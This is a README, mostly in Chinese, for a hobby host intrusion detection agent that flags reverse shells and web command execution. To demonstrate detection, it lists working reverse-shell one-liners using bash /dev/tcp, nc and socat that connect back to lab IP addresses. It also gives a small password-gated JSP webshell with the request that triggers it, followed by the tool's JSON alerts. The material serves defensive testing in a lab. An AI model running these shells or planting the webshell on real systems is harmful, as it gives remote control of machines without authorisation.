Felicia

Simple HIDS/EDR (目前仍在持续开发中...)

Desc

自己写着玩的一个小项目，功能、架构设计已经完成，但由于时间、人力非常有限，代码化比较缓慢，目前只有agent无server，且入侵检测这块目前只支持反弹shell、web rce两块，后续有时间其它功能会慢慢补上。

How to use

root@ubuntu:~# cd Felicia/
root@ubuntu:~/Felicia# make
gcc felicia_plugin_reverse_shell.c felicia_main.c felicia_data_struct.c felicia_process_monitor.c felicia_process_handler.c \
felicia_init.c felicia_plugin_web_rce.c cJSON.c -o demo
root@ubuntu:~/Felicia# ./demo

Sample

反弹shell

受害机：

bash -i >&/dev/tcp/192.168.31.162/7777 0>&1

mknod backpipe p; nc 192.168.31.162 7777 0<backpipe | bash 1>backpipe 2>backpipe

socat TCP4:192.168.30.127:1234 EXEC:bash,pty,stderr,setsid,sigint,sane

or else...

攻击机：

nc -lk 7777

检测结果：

root@ubuntu:~/Felicia# ./demo
reverse shell event
{
  'evt':'rvshell'
  'pid':'19256'
  'exe':'/bin/bash'
  'cmdline':'bash'
  'cwd':'/root/Felicia'
  'ppid':'19255'
  'pexe':'/usr/bin/socat'
  'pcmdline':'socat TCP4:192.168.31.162:7777 EXEC:bash,pty,stderr,setsid,sigint,sane'
  'uid':'0'
  'pname':'bash'
  'stdin':'/dev/pts/3'
  'stdout':'/dev/pts/3'
  'srcip':'192.168.31.115'
  'dstip':'192.168.31.162'
  'srcport':'43696'
  'dstport':'7777'
  'tty':'/dev/pts/3'
  'unixtime':'0'
}

root@ubuntu:~/Felicia# ./demo
reverse shell event
{
  'evt':'rvshell'
  'pid':'19230'
  'exe':'/bin/bash'
  'cmdline':'bash'
  'cwd':'/root/Felicia'
  'ppid':'14615'
  'pexe':'/bin/bash'
  'pcmdline':'-bash'
  'uid':'0'
  'pname':'bash'
  'stdin':'pipe:[140445]'
  'stdout':'/root/Felicia/backpipe'
  'srcip':'192.168.31.115'
  'dstip':'192.168.31.162'
  'srcport':'43694'
  'dstport':'7777'
  'tty':'/dev/pts/4'
  'unixtime':'0'
}

root@ubuntu:~/Felicia# ./demo
reverse shell event
{
  'evt':'rvshell'
  'pid':'18705'
  'exe':'/bin/bash'
  'cmdline':'bash -i'
  'cwd':'/root/Felicia'
  'ppid':'14615'
  'pexe':'/bin/bash'
  'pcmdline':'-bash'
  'uid':'0'
  'pname':'bash'
  'stdin':'socket:[136198]'
  'stdout':'socket:[136198]'
  'srcip':'192.168.31.115'
  'dstip':'192.168.31.162'
  'srcport':'43658'
  'dstport':'7777'
  'tty':'/dev/pts/4'
  'unixtime':'0'
}

web rce

vulnhub tomcat8靶场测试 jsp小马执行命令

受害机：

root@06bc32a5536b:/usr/local/tomcat/webapps/ROOT# cat getshell.jsp
<%
    if("023".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>

攻击机：

http://192.168.31.115:8007/getshell.jsp?pwd=023&i=ls

检测结果：

root@ubuntu:~/Felicia# ./demo
web rce event
{
  'evt':'webrce'
  'pid':'19484'
  'exe':'/bin/ls'
  'cmdline':'ls'
  'cwd':'/usr/local/tomcat'
  'ppid':'15594'
  'pexe':'/usr/lib/jvm/java-7-openjdk-amd64/jre/bin/java'
  'pcmdline':'/usr/lib/jvm/java-7-openjdk-amd64/jre/bin/java -Djava.util.logging.config.file=/usr/local/tomcat/conf/logging.properties -Djava./proc/19484/exe'
  'uid':'0'
  'pname':'ls'
  'stdin':'pipe:[141299]'
  'stdout':'pipe:[141300]'
  'tty':' '
  'unixtime':'0'
}

TODO

威胁情报
敏感文件变更
server（包含前端）
线程池
else...

Link

https://driverxdw.github.io/2020/12/14/Felicia-Hids-Demo-Design/

driverxdw / Felicia